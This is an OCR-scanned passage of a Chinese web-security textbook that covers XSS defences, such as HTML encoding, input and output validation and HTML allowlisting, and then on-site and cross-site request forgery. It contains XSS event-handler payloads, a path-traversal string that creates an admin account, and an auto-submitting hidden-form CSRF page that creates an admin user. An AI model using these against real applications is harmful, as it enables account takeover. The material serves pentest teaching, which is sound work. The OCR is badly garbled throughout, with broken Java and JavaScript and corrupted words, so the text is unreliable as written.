在 Java 平 台中 没有 与 之 等 效 的 API; 但 是 可 以 使 用 数据 形式 的 编码 
构造 自己 的 等 效 方法 。 例 如 : 


public static String HTMLEncode (String s) 
{ 
StringBuffer out = new StringBuffer (); 
for (int i = 0; i < s.length(); i++) 
{ 
char c = s.charAt(i); 
itie > OXT | | C==*"" | | c=='&’ | | C=='<" | | C=='>') 
out.append("&#" + (int) c + ";"); 
else cut.append(c); 
} 
return out.toString({); 


} 


当 处 理 用 户 提交 的 数据 时 ， 开 发 者 种 常会 犯 一 个 错误 ， 即 仅 对 在 
特殊 情况 下 对 攻击 者 有 用 的 字符 进行 HTML 编 码 。 例 如 ， 如 果 数 据 被 
插入 到 一 个 双 引 号 引用 的 字符 串 中 ， 应 用 程序 可 能 只 编码 "字符 ， 如 末 
数据 被 插入 到 一 个 没有 引号 的 标签 中 ， 应 用 程序 只 会 编码 > 字符 。 这 
种 方法 明显 增加 了 攻击 者 避 开 确认 的 风险 。 攻 击 者 常常 利用 浏览 絮 接 
受 无 效 HTML 与 JavaScript 的 弱点 ， 改 变 确 认 情 境 或 以 意外 的 方式 注入 
代码 。 而 且 ， 攻 击 者 可 以 将 一 个 攻击 字符 串 分 布 到 几 个 可 控制 的 字段 
中 ， 利 用 应 用 程序 对 每 个 字段 采用 的 不 同 过 滤 避 开 其 他 过 滤 。 一 种 更 
加 可 靠 的 方法 是 ， 无 论 数 据 插入 到 什么 地 方 ， 始 终 对 攻击 者 可 能 使 用 
的 每 一 个 字符 进行 HTML 编 码 。 为 尽 可 能 地 确保 安全 ， 开 发 者 可 能 会 
选择 HTML 编 码 每 一 个 非 学 母 数字 字符 ， 包 括 空白 符 。 这 种 方法 通常 
会 显著 增加 应 用 程序 的 工作 压力 ， 同 时 给 任何 尝试 避 开 过 滤 的 攻击 设 
置 巨 大 障碍 。 

应 用 程序 之 所 以 结合 使 用 输入 确认 与 输出 净化 ， 原 因 在 于 这 种 方 
法 能 够 提供 两 层 防 御 : 如 采 其 中 一 层 被 攻破 ， 另 一 层 还 能 提供 一 些 保 
护 。 如 上 文 所 述 ， 许 多 执行 输入 与 输出 确认 的 过 滤 都 容易 被 攻破 。 结 
合 这 两 种 技巧 ， 应 用 程序 残 能 够 获得 额外 的 保护 ， 即 使 攻击 者 发 现 其 
中 一 种 过 滤 存 在 缺陷 ， 男 一 种 过 滤 仍 然 能 够 阻止 他 实施 攻击 。 在 这 两 
种 防御 中 ， 输 出 确认 更 为 重要 ， 必 不 可 少 。 实 施 严格 的 输入 确认 应 被 
视 为 一 种 次 要 故障 恢复 (secondary failover) ° 

当然 ， 当 设计 输入 与 输出 确认 机 制 时 ， 我 们 应 特别 小 心 ， 尽 量 避 
免 任 何 可 能 导致 攻击 者 避 开 确认 的 漏洞 。 尤 其 要 注意 的 是 ， 应 在 实施 
相关 规范 化 后 再 对 数据 进行 过 滤 与 编码 ， 而 且 之 后 不 得 对 数据 实施 进 
一 步 的 规范 化 。 应 用 程序 还 必须 保证 其 中 存在 的 空 字 万 不 会 对 它 的 确 
认 造 成 任何 干扰 。 

3. 消除 危险 的 播 入 点 


应 用 程序 页 面 中 有 一 些 位 置 ， 在 这 里 插入 用 户 提 区 的 输入 束 会 造 
成 极 大 的 风险 ; 因此 ， 开 发 者 应 力求 寻找 其 他 方法 执行 必要 的 功能 。 

应 尽量 避免 直接 在 现 有 的 JavaScript 中 插入 用 户 可 控制 的 数据 。 这 
适用 于 <script> 标 签 中 的 代码 ， 也 适用 于 事件 处 理 右 的 代码 。 如 果 应 用 
程序 壬 试 以 安全 的 方式 在 其 中 插入 数据 ， 可 能 整 会 使 攻击 者 有 机 会 避 
开 它 们 实施 的 防御 性 过 小。 一 旦 攻击 者 能 够 控制 提交 数据 的 插入 点 ， 
他 不 用 付出 多 大 努力 就 可 以 注入 任意 脚本 命令 ， 从 而 实施 恶意 操作 。 

如 琳 标 签 属性 接受 URL 作 为 它 的 值 ， 通 党 应 用 程序 应 该 避免 租 入 
SO ee erence 

用 。 

如 采 攻 击 者 通过 插入 一 个 相关 指令 ， 或 者 因为 应 用 程序 使 用 一 个 
请 求 参 数 指定 首选 的 字符 集 ， 因 而 能 够 控制 应 用 程序 啊 应 的 编码 类 
型 ， 那 么 这 些 情 况 也 应 该 加 以 避免 。 在 这 种 情况 下 ， 在 其 他 方面 经 过 
精心 设计 的 输入 与 输出 过 滤 可 能 束 会 失效 ， 因 为 攻击 者 的 输入 进行 了 
不 音 见 的 编码 ， 以 致 上 述 过 滤 并 不 将 其 视 为 恶意 输入 。 只 要 有 可 能 ， 
应 用 程序 应 在 它 的 啊 应 消息 头 中 明确 指定 一 种 编码 类 型 ， 蔡 止 对 它 进 
行 任何 形式 的 修改 ， 并 确保 应 用 程序 的 XSS 过 滤 与 其 兼容 。 例 如 : 


Content-Type: text/html; charset=ISO-8859-1 


4. 人 允许 有 限 的 HTML 

一 些 应 用 程序 需要 允许 用 户 以 HTML 格式 提交 即将 插入 到 应 用 程 
序 响 应 中 的 数据 。 例 如 ， 博 客 应 用 程序 可 能 需要 允许 用 户 使 用 HTML 
撰写 博客 、 对 博客 使 用 格式 、 幅 入 链接 或 图 像 等 。 在 这 种 情况 下 ， 不 
作 区 分 地 应 用 上 述 措施 将 会 导致 错误 。 用 户 的 HTML 标 记 将 在 响应 中 
被 HTML 编 码 ， 因 此 作为 真实 的 标记 显示 在 屏幕 上 ， 而 不 是 以 所 需 的 
格式 化 内 容 显示 。 

为 安全 地 支持 这 种 功能 ， 应 用 程序 需要 保持 稳健 ， 仅 允许 有 限 的 
HTML 子 集 ， 避 免 提 供 任 何 引 入 脚本 代码 的 方法 。 这 包括 采用 一 种 白 
名 单方 法 ， 仅 允许 特定 的 标签 和 属性 。 成 功 做 到 这 一 点 并 不 简单 ， 如 
前 所 述 ， 攻 击 者 可 以 通过 各 种 方法 使 用 看 似 无 害 的 标签 来 执行 代码 。 

例如 ， 如 果 应 用 程序 允许 使 用 <b> 和 <i> 标 签 ， 但 并 不 限制 与 这 些 
标签 一 起 使 用 的 属性 ， 则 攻击 者 可 以 实施 以 下 攻击 : 


<b style=behavior:url (#default#time2) onbegin=alert(1)> 


<i onclick=alert(1})>Click here</i> 


此 外 ， 如 果 应 用 程序 允许 使 用 看 似 安 全 的 <a> 标 签 和 href 属 性 的 组 
合 ， 则 攻击 者 可 以 实施 以 下 攻击 : 

有 各 种 框架 (如 OWASP AntiSamy 项 目 ) 可 用 于 确认 用 户 提 交 的 
HTML 标 记 ， 以 确保 其 中 不 包含 任何 执行 JavaScript 的 方法 。 建 议 需要 
允许 用 户 创建 有 限 HITML 的 开发 者 直接 使 用 某 个 成 熟 的 框架 ， 或 仔细 
分 析 其 中 一 种 框架 ， 以 了 解 面 临 的 各 种 相关 挑战 。 


或 者 ， 也 可 以 采用 某 种 定制 的 中 间 标 记 语 言 ， 人 允许 用 户 使 用 有 限 
的 中 间 语 言语 法 ， 然 后 由 应 用 程序 对 其 进行 处 理 ， 以 生成 相应 的 
HTML 标 记 。 


很 明显 ， 运 今 为 止 ， 我们 描述 的 防御 机 制 并 不 能 防止 基于 DOM 的 
XSS 漏 洞 ， 因 为 造成 这 种 漏洞 并 不 需要 将 用 户 可 控制 的 数据 复制 到 服 
务 器 响应 中 。 

应 用 程序 应 尽量 避免 使 用 客户 端 脚本 处 理 DOM 数 据 并 把 它 插入 到 
页 面 中 。 由 于 被 处 理 的 数据 不 在 服务 器 的 直接 控制 范围 内 ， 有 了 时 甚至 
不 在 它 的 可 见 范围 内 ， 因 此 这 种 行为 存在 着 固有 的 风险 。 

如 果 无 法 避免 地 要 以 这 种 方式 使 用 客户 端 脚本 ， 我 们 可 以 通过 两 
种 防御 方法 防止 基于 DOM 的 XSS 漏 洞 ， 它 们 分 别 与 前 面 描述 的 防止 反 
射 型 XSS 漏 洞 时 使 用 的 输入 与 输出 确认 相对 应 。 

1. 确认 输入 

许多 时 候 ， 应 用 程序 可 以 对 它 处 理 的 数据 执行 严格 的 确认 。 确 
实 ， 在 这 方面 ， 客 户 端 确认 比 服 务 避 端 确认 更 加 有 效 。 在 前 面 描 述 的 
易 受 攻击 的 示例 中 ， 我 们 可 以 通过 确认 将 要 插入 到 文档 中 的 数据 仅 包 
含 字母 数字 字符 与 空白 符 ， 从 而 阻止 攻击 发 生 。 例 如 : 


var a = document.URL; 
a = a.substring(a.indexOf("message=") + 8, a.length)}); 
a = unescape(a) ; 
var regex=/%* ( [A-Za-z0-9+\s])*$/; 
= (regex.test (a) ) 
document .write({a); 


</script> 


除 这 种 客户 端 控 制 外 ， 还 可 以 在 服务 器 端 对 URL 数 据 进行 严格 的 
确认 ， 实 施 深 层 防 御 ， 以 检测 利用 基于 DOM 的 XSS 漏 洞 的 恶意 请 求 。 
在 刚刚 说 明 的 同一 个 示例 中 ， 应 用 程序 甚至 只 需 实 施 服务 器 端 数 据 确 
认 ， 通 过 确认 以 下 数据 来 阻止 攻击 : 

口 查询 字符 串 中 只 有 一 个 参数 ; 
口 参数 名 为 message (大 小 写 检 查 ) ; 


口 参数 值 仅 包 合 字 母 数字 内 容 。 
实施 了 这 些 控 制 后 ， 客 户 端 脚本 仍 有 必要 正确 解析 出 message 参 数 


的 值 ， 确 保 其 中 并 不 包 侣 任何 URL 上 户 断 字符 。 
2. 确认 输出 
与 防止 反射 型 XSS 漏 洞 时 一 样 ， 在 将 用 户 可 控制 的 DOM 数 据 插入 
到 文档 之 前 ， 应 用 程序 也 可 以 对 它们 进行 HTML 编 码 。 这 样 束 可 以 将 
各 种 危险 的 字符 与 表达 式 以 安全 的 方式 显示 在 页 面 中 。 例 如 ， 使 用 下 
面 的 函数 即 可 在 客户 端 JavaScript 中 执行 HITML 编 码 : 
function sanitize(str) 
{ 
var d = document.createElement('div'); 
d.appendChild(document.createTextNode (str) 


return d.innerHTML; 


12.5 小结 


在 这 一 章 中 ， 我 们 讨论 了 各 种 可 能 导致 XSS 漏 洞 的 情形 ， 以 及 一 
些 可 用 于 避 开 基于 过 滤 的 常用 防御 机 制 的 方法 。 由 于 XSS 漏 洞 极为 常 
见 ， 因 此 ， 测 试 员 能 够 轻易 在 应 用 程序 中 发 现 可 供 利 用 的 漏洞 。 但 
是 ， 如 果实 施 的 各 种 防御 机 制 迫 使 测试 员 设 计 出 高 度 目 定义 的 输入 ， 
或 者 利用 HTML、JavaScript 或 VBScript 的 某 些 鲜 为 人 知 的 特性 来 实施 
a tae 这 时 ，XSS 将 会 更 加 引 人 关 注 (至 少 从 研究 角度 看 的 确 

此) 。 

下 一 章 将 以 此 为 基础 ， 并 进一步 讨论 大 量 导 致 用 户 遭 受 恶 意 攻 击 

的 服务 屡 端 Web 应 用 程序 漏洞 。 


12.6 ”问题 


欲 知 问题 答案 ， 请 访问 http://mdsec.net/wahh ° 

(1) 在 应 用 程序 的 行为 中 ， 有 什么 “明显 特征 ”可 用 于 确定 大 多 数 
XSS 漏 洞 ? 

(2) 假设 在 应 用 程序 未 通过 验证 的 功能 区 域 发 现 了 一 个 反射 型 
XSS 漏 洞 。 如 何 利用 这 个 漏洞 攻破 一 个 通过 验证 的 应 用 程序 会 话 ? 请 
想 出 两 种 不 同 的 方法 。 

(3) 假设 一 个 cookie 参 数 未 经 过 任何 过 滤 或 净化 就 被 复制 到 应 用 
程序 的 啊 应 中 。 是 否 可 以 利用 这 种 行为 在 返回 的 页 面 中 注入 任意 
JavaScript? 是 否 可 以 利用 这 种 行为 实施 攻击 其 他 用 户 的 XSS 攻 击 ? 

(4) 假设 在 仅 返 回 给 自己 的 数据 中 发 现 了 保存 型 XSS 漏 洞 。 这 种 
行为 是 否 存 在 安全 缺陷 ? 

(5) 在 一 个 处 理 文件 附件 并 在 浏览 器 中 显示 这 些 内 容 的 Web 邮 件 
应 用 程序 中 ， 可 以 立即 确定 哪 种 常见 的 漏洞 ? 

P > 浏 哆 器 的 同 源 策略 如 何 给 Ajax 技 术 XMLHttpRequest 的 应 用 
造成 影响 ? 

(7) 列举 3 个 利用 XSS 漏 洞 的 可 行 攻击 有 效 载 集 (也 就 是 说 ， 攻 
击 者 可 以 在 其 他 用 户 的 浏览 器 中 执行 的 恶意 操作 而 不 是 传送 攻击 的 方 


法 ) 

(8) 已 知 一 个 反射 型 XSS 漏 洞 ， 可 以 在 返回 页 面 的 HTML 代 码 的 
某 个 位 置 注 入 任意 数据 。 插 入 的 数据 被 截 短 至 50 字 节 ， 但 是 我 们 希望 
注入 一 个 超 长 的 脚本 ， 并 且 不 想 调 用 外 部 服务 器 上 的 脚本 。 如 何 解决 
长 度 限 制 呢 ? 

(9) 在 一 个 必须 使 用 POST 方法 的 请 求 中 发 现 一 个 反射 型 XSS 漏 
洞 。 攻 击 者 可 以 使 用 哪 种 传送 机 制 实施 攻击 ? 


第 13 章 
攻击 用 户 : 其 他 技巧 


在 前 一 章 中 ， 我 们 介绍 了 针对 其 他 应 用 程序 用 户 的 主要 攻击 
跨 站 点 脚本 (XSS) 。 在 这 一 章 中 ， 我 们 将 介绍 一 系列 针对 用 户 的 其 
他 攻击 。 其 中 的 一 些 攻击 与 XSS 攻 击 具 有 很 大 的 相似 性 。 许 多 时 候 ， 
这 些 攻击 比 XSS 更 加 复杂 ， 或 者 隐藏 性 更 强 ， 因 此 ， 在 单纯 的 XSS 攻 
击 无 法 奏效 的 情况 下 ， 它 们 往往 能 够 到 得 成 功 。 

针对 其 他 应 用 程序 用 户 的 攻击 形式 各 异 ， 它 们 之 间 的 微妙 之 处 与 
细微 差别 常常 被 人 们 忽略 。 通 常 ， 与 主要 的 服务 器 端 攻击 相 比 ， 人 们 
对 它们 也 知之 其 少 ， 即 使 经 验 丰富 的 渗透 测试 员 也 会 混淆 或 忽略 各 种 
不 同 的 漏洞 。 我 们 将 在 本 章 中 介绍 各 种 常见 的 漏洞 ， 并 说 明确 认 并 利 
用 这 些 漏洞 所 需 采 取 的 步骤 。 


AAA 一 


13.1 了 


在 上 一 章 中 ， 我 们 介绍 了 如 何 利用 XSS 攻 击 户 使 用 户 在 不 知情 的 
情况 下 在 应 用 程序 中 执行 操作 。 如 果 受 害 用 户 拥 有 管理 权限 ， 使 用 这 
种 技巧 就 可 以 迅速 完全 侵入 应 用 程序 。 在 这 一 节 中 ， 我 们 将 介绍 另外 
一 些 可 用 于 诱 使 其 他 用 户 执行 操作 的 方法 。 这 些 方法 甚至 可 以 用 在 已 
防范 XSS 攻 击 的 应 用 程序 中 。 


13.1.1 ”请求 伪造 


这 种 类 型 的 攻击 也 称 为 会 话 车 置 (session riding) ， 它 们 与 会 话 动 
持 攻 击 密 切 相 关 ， 在 攻击 过 程 中 ， 攻 击 者 截获 一 名 用 户 的 会 话 令 牌 ， 
因而 能 够 “作为 ”该 用 户 使 用 应 用 程序 。 但 是 ， 通 过 请 求 仿造， 攻击 者 
根本 不 需要 知道 受害 者 的 会 话 令 牌 。 相 反 ， 攻 击 者 利用 web 浏览 需 的 
正常 行为 劫持 用 户 的 令 牌 ， 并 通过 它 提 出 用 户 并 不 打算 提出 的 请 求 。 

请 求 伪 造 漏洞 分 为 两 种 类 型 : 本 站 点 和 器 站 点 。 
1. 本 站 点 请 求 伪 造 

本 站 点 请 求 伪造 (On-Site Request Forgery, OSRF) 是 一 种 利用 保 
存 型 XSS 漏 洞 的 常见 攻击 有 将 载 何 。 在 上 一 章 介 绍 的 MySpace 蠕 虫 示 
例 中 ， 一 位 名 叫 Samy 的 用 户 在 目 己 的 用 户 资 料 中 插入 一 段 肢 本， 致使 
任何 查看 其 资料 的 用 户 在 不 知情 的 情况 下 执行 各 种 操作 。 另 外 ， 即 使 
在 XSS 漏 洞 并 不 存在 的 地 方 ， 保 存 型 OSRF 漏 洞 仍 有 可 能 存在 ， 这 点 常 
被 人 们 忽视 。 

以 消息 公告 牌 应 用 程序 为 例 ， 它 允许 用 户 提 交 可 被 其 他 用 户 查 看 
的 数据 。 该 应 用 程序 使 用 以 下 请 求 提交 消 忆 : 


POST /submit .php 
Host: wahh-app.com 
Content-Length: 34 


tyoe=question&name=daf&message=foo 


Ih Ma SCH LAP AAAS BIA JS I F : 
<tr> 
<td><img src="/images/question.gif"></td> 
<td>daf</td> 
<td>foo</td> 


</tr> 


在 这 种 情况 下 ， 测 试 员 当 然 会 测试 其 中 是 否 存在 XSS 漏 洞 。 但 
是 ， 假 设 应 用 程序 对 插入 页 面 中 的 任何 “*“、< 和 > 字符 进行 了 正确 地 
HTML 编 码 。 如 有 果 对 这 种 防御 方法 感到 满意 ， 觉 得 攻击 者 无 论 如何 也 
无 法 避 开 它 ， 测 试 员 束 会 继续 进行 下 一 步 测试 。 

但 是 ， 稍 等 。 我 们 控制 的 仅仅 是 <img> 标 签 目 标的 一 部 分 内 容 。 
虽然 我 们 无 法 破坏 引用 字符 串 ， 但 是 可 以 修改 URL， 使 得 查看 消息 的 
任何 用 户 提出 任意 一 个 本 站 点 GET 请 求 。 例 如 ， 在 type 参 数 中 提交 下 
i 
请 求 : 


../admin/newyser.php?username=daf2gcassword=0wned&krole=admin# 


如 果 一 名 普通 用 户 补 诱 使 提出 攻击 者 专门 设计 的 请 求 ， 攻 击 当 然 
` 会 成 功 。 但 是 ， 如 果 管 理 员 查 看 消息 ， 攻 击 者 束 可 以 建立 一 个 秘密 
账户 。 上 面 的 示例 证 明 ， 即 使 无 法 实施 XSS 攻 击 ， 但 攻击 者 仍然 能 够 
成 功 执行 OSRF 攻 击 。 当 然 ， 即 使 管理 员 采 取 了 防范 措施 ， 禁 用 了 
JavaScript， 攻 击 依 然 能 够 成 功 。 

注意 ， 在 前 面 的 攻击 字符 串 中 ，# 符 终止 了 .gif 后 缀 前面 的 URL 。 
但 是 ， 只 需 在 后 颖 前 插入 一 个 &， 构 成 男 外 一 个 请 求 参数 ， 即 可 解决 
以 上 问题 。 


尝试 访问 


在 以 下 示例 中 ， 可 以 将 OSRFE 有 效 载荷 放 在 最 近 的 搜索 列表 
中 ， 即 使 其 并 不 易于 受到 XSS 攻 击 : 
http://mdsec.net/search/77/ 


渗透 测试 步骤 


(1) 如 果 一 名 用 户 提交 的 数据 在 某 个 位 置 显示 给 其 他 用 户 ， 
但 测试 员 仍然 无 法 实施 保存 型 XSS 攻 击 ， 那 么 在 每 个 这 样 的 位 置 ， 
检查 应 用 程序 的 行为 是 否 使 得 它 易 于 受到 OSRF 攻 击 。 


(2) 用 户 提 交 的 数据 被 插入 到 超 链接 目标 或 返回 页 面 中 的 其 
他 URL 等 位 置 时 往往 会 出 现 调 润 。 除 非 应 用 程序 特别 阻止 要 求 的 任 
何 字符 (通常 包括 点 、 斜 线 及 查询 字符 串 中 的 分 隔 符 ， ， 否 则 它 肯 
定 易于 受到 攻击 。 

(3) 如 果 发 现 OSRF 漏 洞 ， 则 应 寻找 一 个 适当 的 请 求 作为 利用 
目标 ， 如 下 一 节 “ 跨 站 点 请 求 伪造 ?所 述 。 


在 将 其 合并 到 响应 中 之 前 ， 尽 可 能 严格 地 确认 用 户 提交 的 输入 ， 
即 可 防止 OSRF 漏 洞 。 例 如 ， 在 前 面 的 示例 中 ， 应 用 程序 可 能 会 检查 
type 参 数 中 是 否 有 一 组 值 中 的 某 一 个 特殊 的 值 。 如 果 应 用 程序 必须 接 
受 无 法 预料 的 其 他 值 ， 那 么 应 阻止 任何 包含 / .\? & 与 = 的 请 求 。 

注意 ， 对 这 些 字符 进行 HTML 编码 并 不 能 有 效 防 止 OSRF 攻 击 ， 
为 浏览 器 在 请 求 目 标 URL 字 符 串 之 前 ， 会 首先 对 其 进行 解码 。 

根据 插入 点 与 周围 环境 的 不 同 ， 使 用 与 下 一 蔬 描 述 的 防止 CSRF 攻 
击 时 使 用 的 同 种 防御 方法 ， 也 可 以 防止 OSRF 攻 击 。 
2. 路 站 点 请 求 伪造 

在 跨 站 点 请 求 伪 造 (CSRF) 攻击 中 ， 攻 击 者 只 需 创 建 一 个 看 似 无 
害 的 网 站 ， 人 致使 用 户 的 浏览 絮 直 接 同 易 受 攻击 的 应 用 程序 提交 一 个 请 
求 ， 执 行 某 种 有 利于 攻击 者 的 “无 意 ” 操 作 。 

如 前 所 述 ， 同 源 策略 并 不 阻止 一 个 网 站 向 男 一 个 域 提出 请 求 。 但 
是 ， 它 确实 阻止 提出 请 求 的 网 站 处 理 跨 域 请 求 的 响应 。 因 此 ， 正 常情 
况 下 ，CSRF 攻 击 只 是 一 种 “ 单 同 ” 攻 击 。 所 以 ， 在 纯粹 的 CSRF 攻 击 
中 ， 要 想 实施 如 Samy XSS 蠕 虫 中 的 多 阶段 操作 ， 从 响应 中 读 取 数据 并 
将 其 合并 到 随后 的 请 求 中 ， 将 很 难 实现 。 (我 们 将 在 本 章 后 面部 分 介 
绍 如 何 对 利用 CSRF 技 巧 的 某 些 方法 进行 扩展 ， 以 执行 有 限 的 双向 攻 
击 ， 跨 域 获取 数据 。) 


l 以 某 个 允许 管理 员 使 用 以 下 请 求 创建 新 用 户 账户 的 应 用 程序 为 
列 : 


POST /auth/390/NewUserStep2.ashx HTTP/1.1 

Host: mdsec.net 

Cookie: SessicnId=8299BE6B260193DA076383A2385BO7B9 
Content-Type: application/x-www-form-urlenceded 
Content-Length: 83 


realname=da f&username=da fauserro le=adminkpassword=lLetmeinlas 
conlirmpassword-letmeinl 


此 请 求 有 3 个 主要 特点 导致 它 易于 受到 CSRF 攻 击 。 

口 该 请 求 执行 特权 操作 。 在 上 述 示 例 中 ， 该 请 求 使 用 管理 员 权 限 
创建 了 一 个 新 用 户 。 

口 应 用 程序 仅仅 依靠 HTTP cookie 来 追踪 会 话 。 请 求 中 的 任何 其 他 
位 置 均 未 传送 会 话 相 关 的 令 牌 。 

口 攻 击 者 可 以 确定 执行 操作 所 需 的 所 有 参数 。 除 cookie 中 的 会 话 
令 牌 外 ， 请 求 中 不 需要 包含 任何 无 法 预测 的 值 。 

针对 这 些 特点 表现 出 的 缺陷 ， 攻 击 者 可 以 构建 一 个 Web 页 面 ， 问 
易 受 攻击 的 应 用 程序 提出 一 个 跨 域 请 求 ， 在 其 中 包含 执行 特权 操作 所 
需 的 所 有 步骤 。 以 下 为 这 种 攻击 的 一 个 示例 : 


<html> 

<body> 

<form action="httyps: //mdsec.net/auth/390/NewUserStep2.ashx" 
method="POST"> 

<input type="hidden" name="realname" value="dai"> 


<input type="hidden” name="username" value="dai"> 
<input type="hidden” name="userrole" value="admin"> 
<input type="hidden" name="password" value="letmeinl"> 


<input type="hidden” name="confirmpassword" value="letmeinl"> 
</form> 

<script> 

Gocument.forms[0].submit{); 

</script> 

</body> 


</html> 
该 攻击 将 所 有 请 求 参数 放 入 隐藏 表单 字段 中 ， 并 包含 一 段 用 于 目 
动 提 交 表 单 的 脚本 。 用 户 的 浏览 器 提交 此 表单 时 ， 将 上 自动 添加 用 户 的 
目标 域 的 cookie， 并 且 应 用 程序 会 正常 处 理 生成 的 请 求 。 如 采 管 理 用 


户 登 录 到 易 受 攻击 的 应 用 程序 ， 并 访问 攻击 者 的 包含 此 表单 的 Web 页 
面 ， 该 请 求 将 在 管理 员 的 会 话 中 人 处理， 攻击 者 的 账户 因此 得 以 创建 。 


尝试 访问 


http://mdsec.net/auth/390/ 


20044F, Dave Armstrong 在 eBay 应 用 程序 中 发 现 了 一 个 典型 CSRF 
漏洞 。 攻 击 者 可 以 设计 一 个 URL， 使 得 请 求 这 个 URL 的 用 户 对 某 个 拍 
卖 品 给 出 任意 标价 。 某 个 第 三 方 网 站 可 以 诱 使 访问 者 请 求 这 个 URL,， 
以 致 于 任何 访问 这 个 网 站 的 eBay 用 户 都 会 报 出 一 个 标价 。 而 且 ， 进 行 
调整 后 ， 我 们 还 可 以 在 同一 eBay 应 用 程序 的 一 个 保存 型 OSRF 攻 击 中 
利用 这 个 漏洞 。 应 用 程序 允许 用 户 在 拍卖 品 措 述 中 插入 <img> 标 签 。 
为 防止 攻击 ， 应 用 程序 确认 标签 目标 返回 了 真正 的 图 像 文件 。 但 是 ， 
攻击 者 也 可 以 在 上 述 位 置 插 入 一 个 指向 站 外 服务 器 的 链接 ( 它 在 创建 
担 卖 品 时 返回 一 幅 合法 的 图 像 ) ， 并 随后 用 一 个 返回 他 专门 设计 的 
CSRF URL 的 HTTP 重 定向 代替 这 个 链接 。 因 此 ， 任 何 查看 拍卖 品 的 用 
户 都 会 在 不 知情 的 情况 下 给 出 一 个 标价 。 欲 知 攻击 详情 ， 请 查阅 最 初 
在 Bugtraq 上 发 表 的 文章 : 

http://archive.cert.uni-stuttgart.de/bugtraq/2005/04/msg00279.html 


T 注解 应 用 程序 确认 站 外 图 像 方面 的 漏洞 称 为 “检查 时 间 ， 
使 用 时 间 ”(TOCTOU) 漏洞 。 因 为 某 个 数据 在 一 个 时 间 确 认 ， 却 


在 另 一 个 时 间 使 用 ， 导 致 攻击 者 能 够 在 这 两 个 时 间 的 间隔 内 修改 该 
数据 的 值 。 


@ 利用 CSRF 漏 洞 

CSRF 漏 洞 主要 出 现在 应 用 程序 仅 依赖 HTTP cookie 追 踪 会 话 令 牌 
的 情况 下 。 一 旦 应 用 程序 已 经 在 用 户 的 浏览 器 中 设 定 了 cookie， 浏 览 
器 会 自动 在 随后 的 每 个 请 求 中 将 这 个 cookie 提 交 给 应 用 程序 。 无 论 请 
求 是 源 自 某 个 链接 、 应 用 程序 本 映 中 的 表单 或 任何 其 他 地 方 (如 外 部 
网 站 或 在 电子 邮件 中 单 击 的 链接 ) ， 它 都 会 这 样 做 。 如 果 应 用 程序 未 


采取 防范 措施 来 阻止 攻击 者 以 这 种 方式 “车 置 * 它 的 用 户 的 会 话 ， 它 就 
易于 受到 CSRF 攻 击 。 


渗透 测试 步骤 


(1) 根据 在 应 用 程序 解析 过 程 中 得 到 的 结果 (请 参阅 第 4 章 了 
解 相关 内 容 )  ， 检 查 应 用 程序 的 关键 功能 。 

(2) 找到 一 项 可 用 于 代表 不 知情 的 用 户 执行 某 种 敏感 操作 的 
应 用 程序 功能 ， 该 功能 仅 依 赖 cookie 来 追踪 用 户 会 话 ， 并 且 使 用 攻 
击 者 能 够 提前 决定 的 请 求 参数 ， 也 就 是 说 ， 其 中 并 不 包含 任何 会 话 
令 牌 或 其 他 无 法 预测 的 数据 。 

(3) 创建 一 个 HTML 页 面 ， 它 不 需要 进行 任何 用 户 交 互 即 可 提 
出 所 需 请 求 。 对 于 GET 请 求 ， 可 以 使 用 <img> 标 签 ， 并 通过 src 参 数 
设置 易 受 攻击 的 URL。 对 于 POST 请 求 ， 可 以 建立 一 个 表单 ， 其 中 
包含 实施 攻击 所 需 全 部 相关 参数 的 隐藏 字段 ， 并 将 其 目标 设置 为 易 
受 攻 击 的 URL。 可 以 使 用 JavaScript 在 页 面 加 载 时 目 动 提 交 该 表单 。 

(4) 登录 应 用 程序 后 ， 使 用 同一 个 浏览 器 加 载 专 门 设计 的 
HTML 页 面 。 确 认 应 用 程序 是 否 执行 所 需 操 作 。 


Vv 提示 由 于 引入 了 其 他 攻击 向 量 ，CSRF 攻 击 的 可 能 性 改变 
了 许多 其 他 类 型 的 漏洞 的 影响 范围 。 例 如 ， 如 果 某 项 管理 功能 接受 
参数 中 的 用 户 标 识 符 ， 然 后 显示 与 指定 用 户 有 关 的 信息 。 该 功能 受 
到 严格 的 访问 控制 ， 但 它 的 uid 参 数 中 包含 SQL 注入 漏洞 。 由 于 应 用 
程序 管理 员 为 可 信用 户 ， 并 且 在 任何 情况 下 都 能 够 完全 控制 数据 
库 ， 因 此 ， 这 种 SQL 注入 漏洞 被 认为 风险 较 低 。 但 是 ， 由 于 该 功能 
并 不 执行 任何 管理 操作 〈 根 据 最 初 的 设计 ) ， 因 此 其 并 未 采取 防范 
CSRE 的 措施 。 从 攻击 者 的 角度 看 ， 该 功能 与 专门 供 管理 员 执 行 任 
意 SQL 查 询 的 功能 一 样 重要 。 如 果 可 以 注入 一 个 执行 某 种 敏感 操 
作 ， 或 通过 带 外 通道 检索 数据 的 查询 ， 那 么 即使 是 非 管理 用 户 也 可 
以 通过 CSRF 实 施 这 种 攻击 。 


e 给 证 与 CSRF 


由 于 实施 CSRF 攻 击 需 要 在 受害 用 户 的 会 话 中 执行 某 种 特权 操作 ， 
因此 ， 在 实施 攻击 时 ， 用 户 需 要 登录 到 应 用 程序 。 

一 个 存在 大 量 和 危险 的 CSRF 漏 洞 的 位 置 ， 是 家 庭 DSL 路 由 器 使 用 的 
Web 界 面 。 这 些 设备 大 多 包含 敏感 功能 ， 如 打开 面向 互联 网 的 防火 墙 
上 的 所 有 端口 。 由 于 这 些 功 能 通常 并 未 采取 防范 CSRE 的 措施 ， 并 且 多 
数 用 户 也 没有 修改 设备 的 默认 内 部 也 地 址 ， 因 此 ， 它 们 易于 受到 由 和 恶 
意外 部 站 点 传送 的 CSRF 攻 击 。 人 但是， 相关 设备 通常 需要 进行 验证 才能 
执行 人 敏感 操作 ， 而 且 许多 用 户 并 未 登录 他 们 的 设备 © 

如 果 设 备 的 Web 界 面 使 用 基于 表单 的 验证 ， 则 可 以 通过 首先 使 用 
户 登 录 设备 ， 然 后 执行 经 过 验证 的 操作 ， 从 而 实施 两 步 攻 击 。 由 于 大 
多 数 用 户 并 未 修改 这 类 设备 的 默认 证 书 (可 能 认为 该 Web 界 面 只 能 通 
过 内 部 家 庭 网 络 访问 ) ， 因 此 ， 攻 击 者 的 网 页 可 以 首先 提出 包含 默认 
证 书 的 登 隶 请求。 然后， 设备 会 在 用 户 的 浏览 右 中 设置 一 个 会 话 令 
人 
k o 

在 其 他 情况 下 ， 攻 击 者 可 能 需要 受害 用 户 以 攻击 者 自身 的 用 户 账 
户 登 录 应 用 程序 才能 实施 特定 的 攻击 。 以 一 个 允许 用 户 上 传 并 存储 文 
